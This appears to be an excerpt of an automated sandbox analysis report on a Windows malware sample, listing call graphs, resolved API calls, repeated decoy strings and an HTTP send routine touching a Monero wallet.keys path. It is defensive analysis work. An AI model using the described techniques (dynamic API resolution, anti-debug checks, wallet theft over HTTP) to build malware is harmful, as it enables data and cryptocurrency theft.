15948->15950 15957 4b5913 15949->15957 15951 4ca9b0 4 API calls 15950->15951 15952 4b52b9 15951->15952 15953 4ca8a0 lstrcpy 15952->15953 15954 4b52c2 15953->15954 15955 4ca9b0 4 API calls 15954->15955 15956 4b5303 15955->15956 15958 4ca920 3 API calls 15956->15958 15957->15903 15959 4b530a 15958->15959 15960 4ca8a0 lstrcpy 15959->15960 15961 4b5313 15960->15961 15962 4b5329 InternetConnectA 15961->15962 15962->15938 15963 4b5359 HttpOpenRequestA 15962->15963 15965 4b58b7 InternetCloseHandle 15963->15965 15966 4b53b7 15963->15966 15965->15938 15967 4ca9b0 4 API calls 15966->15967 15968 4b53cb 15967->15968 15969 4ca8a0 lstrcpy 15968->15969 15970 4b53d4 15969->15970 15971 4ca920 3 API calls 15970->15971 15972 4b53f2 15971->15972 15973 4ca8a0 lstrcpy 15972->15973 15974 4b53fb 15973->15974 15975 4ca9b0 4 API calls 15974->15975 15976 4b541a 15975->15976 15977 4ca8a0 lstrcpy 15976->15977 15978 4b5423 15977->15978 15979 4ca9b0 4 API calls 15978->15979 15980 4b5444 15979->15980 15981 4ca8a0 lstrcpy 15980->15981 15982 4b544d 15981->15982 15983 4ca9b0 4 API calls 15982->15983 16077 4c8ead CryptBinaryToStringA 16076->16077 16078 4c8ea9 16076->16078 16077->16078 16079 4c8ece GetProcessHeap RtlAllocateHeap 16077->16079 16078->15922 16079->16078 16080 4c8ef4 codecvt 16079->16080 16081 4c8f05 CryptBinaryToStringA 16080->16081 16081->16078 16085->15360 16328 4b9880 16086->16328 16088 4b98e1 16088->15367 16090 4ca740 lstrcpy 16089->16090 16263 4ca740 lstrcpy 16262->16263 16264 4c0266 16263->16264 16265 4c8de0 2 API calls 16264->16265 16266 4c027b 16265->16266 16267 4ca920 3 API calls 16266->16267 16268 4c028b 16267->16268 16269 4ca8a0 lstrcpy 16268->16269 16270 4c0294 16269->16270 16329 4b988e 16328->16329 16332 4b6fb0 16329->16332 16331 4b98ad codecvt 16331->16088 16335 4b6d40 16332->16335 16336 4b6d63 16335->16336 16346 4b6d59 16335->16346 16351 4b6530 16336->16351 16340 4b6dbe 16340->16346 16361 4b69b0 16340->16361 16342 4b6e2a 16343 4b6ee6 VirtualFree 16342->16343 16345 4b6ef7 16342->16345 16342->16346 16343->16345 16344 4b6f41 16344->16346 16349 4c89f0 2 API calls 16344->16349 16345->16344 16347 4b6f38 16345->16347 16348 4b6f26 FreeLibrary 16345->16348 16346->16331 16350 4c89f0 2 API calls 16347->16350 16348->16345 16349->16346 16350->16344 16352 4b6542 16351->16352 16354 4b6549 16352->16354 16371 4c8a10 GetProcessHeap RtlAllocateHeap 16352->16371 16354->16346 16355 4b6660 16354->16355 16358 4b668f VirtualAlloc 16355->16358 16357 4b6730 16359 4b673c 16357->16359 16360 4b6743 VirtualAlloc 16357->16360 16358->16357 16358->16359 16359->16340 16360->16359 16362 4b69c9 16361->16362 16367 4b69d5 16361->16367 16363 4b6a09 LoadLibraryA 16362->16363 16362->16367 16365 4b6a32 16363->16365 16363->16367 16364 4b6ae0 16364->16367 16369 4b6ba8 GetProcAddress 16364->16369 16365->16364 16372 4c8a10 GetProcessHeap RtlAllocateHeap 16365->16372 16367->16342 16368 4b6a8b 16368->16367 16370 4c89f0 2 API calls 16368->16370 16369->16364 16369->16367 16370->16364 16371->16354 16372->16368

                              Executed Functions

                              Function 004C9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 660 4c9860-4c9874 call 4c9750 663 4c987a-4c9a8e call 4c9780 GetProcAddress * 21 660->663 664 4c9a93-4c9af2 LoadLibraryA * 5 660->664 663->664 666 4c9b0d-4c9b14 664->666 667 4c9af4-4c9b08 GetProcAddress 664->667 669 4c9b46-4c9b4d 666->669 670 4c9b16-4c9b41 GetProcAddress * 2 666->670 667->666 671 4c9b4f-4c9b63 GetProcAddress 669->671 672 4c9b68-4c9b6f 669->672 670->669 671->672 673 4c9b89-4c9b90 672->673 674 4c9b71-4c9b84 GetProcAddress 672->674 675 4c9bc1-4c9bc2 673->675 676 4c9b92-4c9bbc GetProcAddress * 2 673->676 674->673 676->675
                              APIs
                              • GetProcAddress.KERNEL32(76F70000,01180690), ref: 004C98A1
                              • GetProcAddress.KERNEL32(76F70000,01180630), ref: 004C98BA
                              • GetProcAddress.KERNEL32(76F70000,011806F0), ref: 004C98D2
                              • GetProcAddress.KERNEL32(76F70000,011807B0), ref: 004C98EA
                              • GetProcAddress.KERNEL32(76F70000,011806C0), ref: 004C9903
                              • GetProcAddress.KERNEL32(76F70000,011889D8), ref: 004C991B
                              • GetProcAddress.KERNEL32(76F70000,011767E0), ref: 004C9933
                              • GetProcAddress.KERNEL32(76F70000,011768E0), ref: 004C994C
                              • GetProcAddress.KERNEL32(76F70000,011806D8), ref: 004C9964
                              • GetProcAddress.KERNEL32(76F70000,01180720), ref: 004C997C
                              • GetProcAddress.KERNEL32(76F70000,01180750), ref: 004C9995
                              • GetProcAddress.KERNEL32(76F70000,01180768), ref: 004C99AD
                              • GetProcAddress.KERNEL32(76F70000,01176800), ref: 004C99C5
                              • GetProcAddress.KERNEL32(76F70000,01180780), ref: 004C99DE
                              • GetProcAddress.KERNEL32(76F70000,01180798), ref: 004C99F6
                              • GetProcAddress.KERNEL32(76F70000,01176640), ref: 004C9A0E
                              • GetProcAddress.KERNEL32(76F70000,011807C8), ref: 004C9A27
                              • GetProcAddress.KERNEL32(76F70000,01180810), ref: 004C9A3F
                              • GetProcAddress.KERNEL32(76F70000,01176940), ref: 004C9A57
                              • GetProcAddress.KERNEL32(76F70000,01180828), ref: 004C9A70
                              • GetProcAddress.KERNEL32(76F70000,01176600), ref: 004C9A88
                              • LoadLibraryA.KERNEL32(01180870,?,004C6A00), ref: 004C9A9A
                              • LoadLibraryA.KERNEL32(011808B8,?,004C6A00), ref: 004C9AAB
                              • LoadLibraryA.KERNEL32(01180888,?,004C6A00), ref: 004C9ABD
                              • LoadLibraryA.KERNEL32(011808A0,?,004C6A00), ref: 004C9ACF
                              • LoadLibraryA.KERNEL32(01180840,?,004C6A00), ref: 004C9AE0
                              • GetProcAddress.KERNEL32(76DA0000,01180858), ref: 004C9B02
                              • GetProcAddress.KERNEL32(75840000,011808D0), ref: 004C9B23
                              • GetProcAddress.KERNEL32(75840000,01188D78), ref: 004C9B3B
                              • GetProcAddress.KERNEL32(753A0000,01188C10), ref: 004C9B5D
                              • GetProcAddress.KERNEL32(77300000,011765E0), ref: 004C9B7E
                              • GetProcAddress.KERNEL32(774D0000,01188B48), ref: 004C9B9F
                              • GetProcAddress.KERNEL32(774D0000,NtQueryInformationProcess), ref: 004C9BB6
                              Strings
                              • NtQueryInformationProcess, xrefs: 004C9BAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: c54a9093c3465a910ac8d89b71ba74d361ca0f70734187b37c135351c89d2651
                              • Instruction ID: e8cdd657b795663acbd991c8536d8d10b282d7262f556408c5ae60560a67d918
                              • Opcode Fuzzy Hash: c54a9093c3465a910ac8d89b71ba74d361ca0f70734187b37c135351c89d2651
                              • Instruction Fuzzy Hash: 32A14BF9500201AFD344EFE9ED88EB637FBF748381704A61AE61DC3264D679A841CB52
                              Function 004B45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 764 4b45c0-4b4695 RtlAllocateHeap 781 4b46a0-4b46a6 764->781 782 4b474f-4b47a9 VirtualProtect 781->782 783 4b46ac-4b474a 781->783 783->781
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004B460E
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 004B479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004B46AC
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004B4657
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004B471E
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004B4678
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004B46B7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004B46CD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004B466D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004B45D2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004B473F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004B45F3
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004B4683
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004B45C7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004B46C2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004B4662
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004B4765
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004B4729
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004B4617
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004B45E8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004B477B
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004B4622
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004B46D8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004B462D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004B45DD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004B474F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004B475A
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004B4713
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004B4643
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004B4770
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004B4734
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004B4638
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: 837d40f133f6a6571f2ad7399ce1a4a568560429075f3f2279ad6b5a57f67104
                              • Instruction ID: d733b2e33822f61223967cacdcfb024c3ff6cdad93277e00a41dc5171ea61af8
                              • Opcode Fuzzy Hash: 837d40f133f6a6571f2ad7399ce1a4a568560429075f3f2279ad6b5a57f67104
                              • Instruction Fuzzy Hash: 6E41D364FC66046BCE6CB7A4886DF9DB65EDF5A701F605847BC04623C2CFF86620452B
                              Function 004B4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 801 4b4880-4b4942 call 4ca7a0 call 4b47b0 call 4ca740 * 5 InternetOpenA StrCmpCA 816 4b494b-4b494f 801->816 817 4b4944 801->817 818 4b4ecb-4b4ef3 InternetCloseHandle call 4caad0 call 4b9ac0 816->818 819 4b4955-4b4acd call 4c8b60 call 4ca920 call 4ca8a0 call 4ca800 * 2 call 4ca9b0 call 4ca8a0 call 4ca800 call 4ca9b0 call 4ca8a0 call 4ca800 call 4ca920 call 4ca8a0 call 4ca800 call 4ca9b0 call 4ca8a0 call 4ca800 call 4ca9b0 call 4ca8a0 call 4ca800 call 4ca9b0 call 4ca920 call 4ca8a0 call 4ca800 * 2 InternetConnectA 816->819 817->816 829 4b4f32-4b4fa2 call 4c8990 * 2 call 4ca7a0 call 4ca800 * 8 818->829 830 4b4ef5-4b4f2d call 4ca820 call 4ca9b0 call 4ca8a0 call 4ca800 818->830 819->818 905 4b4ad3-4b4ad7 819->905 830->829 906 4b4ad9-4b4ae3 905->906 907 4b4ae5 905->907 908 4b4aef-4b4b22 HttpOpenRequestA 906->908 907->908 909 4b4b28-4b4e28 call 4ca9b0 call 4ca8a0 call 4ca800 call 4ca920 call 4ca8a0 call 4ca800 call 4ca9b0 call 4ca8a0 call 4ca800 call 4ca9b0 call 4ca8a0 call 4ca800 call 4ca9b0 call 4ca8a0 call 4ca800 call 4ca9b0 call 4ca8a0 call 4ca800 call 4ca920 call 4ca8a0 call 4ca800 call 4ca9b0 call 4ca8a0 call 4ca800 call 4ca9b0 call 4ca8a0 call 4ca800 call 4ca920 call 4ca8a0 call 4ca800 call 4ca9b0 call 4ca8a0 call 4ca800 call 4ca9b0 call 4ca8a0 call 4ca800 call 4ca9b0 call 4ca8a0 call 4ca800 call 4ca9b0 call 4ca8a0 call 4ca800 call 4ca920 call 4ca8a0 call 4ca800 call 4ca740 call 4ca920 * 2 call 4ca8a0 call 4ca800 * 2 call 4caad0 lstrlen call 4caad0 * 2 lstrlen call 4caad0 HttpSendRequestA 908->909 910 4b4ebe-4b4ec5 InternetCloseHandle 908->910 1021 4b4e32-4b4e5c InternetReadFile 909->1021 910->818 1022 4b4e5e-4b4e65 1021->1022 1023 4b4e67-4b4eb9 InternetCloseHandle call 4ca800 1021->1023 1022->1023 1024 4b4e69-4b4ea7 call 4ca9b0 call 4ca8a0 call 4ca800 1022->1024 1023->910 1024->1021
                              APIs
                                • Part of subcall function 004CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 004CA7E6
                                • Part of subcall function 004B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004B4839
                                • Part of subcall function 004B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 004B4849
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004B4915
                              • StrCmpCA.SHLWAPI(?,0118E2D0), ref: 004B493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004B4ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,004D0DDB,00000000,?,?,00000000,?,",00000000,?,0118E210), ref: 004B4DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 004B4E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004B4E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004B4E49
                              • InternetCloseHandle.WININET(00000000), ref: 004B4EAD
                              • InternetCloseHandle.WININET(00000000), ref: 004B4EC5
                              • HttpOpenRequestA.WININET(00000000,0118E1D0,?,0118DA58,00000000,00000000,00400100,00000000), ref: 004B4B15
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                                • Part of subcall function 004CA920: lstrcpy.KERNEL32(00000000,?), ref: 004CA972
                                • Part of subcall function 004CA920: lstrcat.KERNEL32(00000000), ref: 004CA982
                              • InternetCloseHandle.WININET(00000000), ref: 004B4ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: 4a6d6e57a14ca556bce6701f105f79310248a3775e45a53e68d12b0d2cf16f5e
                              • Instruction ID: fc5b6618d389d8289f9c741224d7e097feb888c5a04052c4e65f9888f759a9e1
                              • Opcode Fuzzy Hash: 4a6d6e57a14ca556bce6701f105f79310248a3775e45a53e68d12b0d2cf16f5e
                              • Instruction Fuzzy Hash: F812E97591011CABDB54FB91DCA2FEEB339AF14308F5041AEB10662091DF782E59CB7A
                              Function 004C7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004B11B7), ref: 004C7880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004C7887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 004C789F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: d9afba122bb956704d0e10e2d0b8e9ec02d20d22a61bd10e3cff8ad42c4c46db
                              • Instruction ID: 90f8ac01045d6828d02ec3262422562799b3a82d00309c1fc0d8c84673c51551
                              • Opcode Fuzzy Hash: d9afba122bb956704d0e10e2d0b8e9ec02d20d22a61bd10e3cff8ad42c4c46db
                              • Instruction Fuzzy Hash: D9F03CF5944208ABC700DFD9DD49FAABBB8EB04761F10025AEA15A2680C7B81904CBA2
                              Function 004B1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
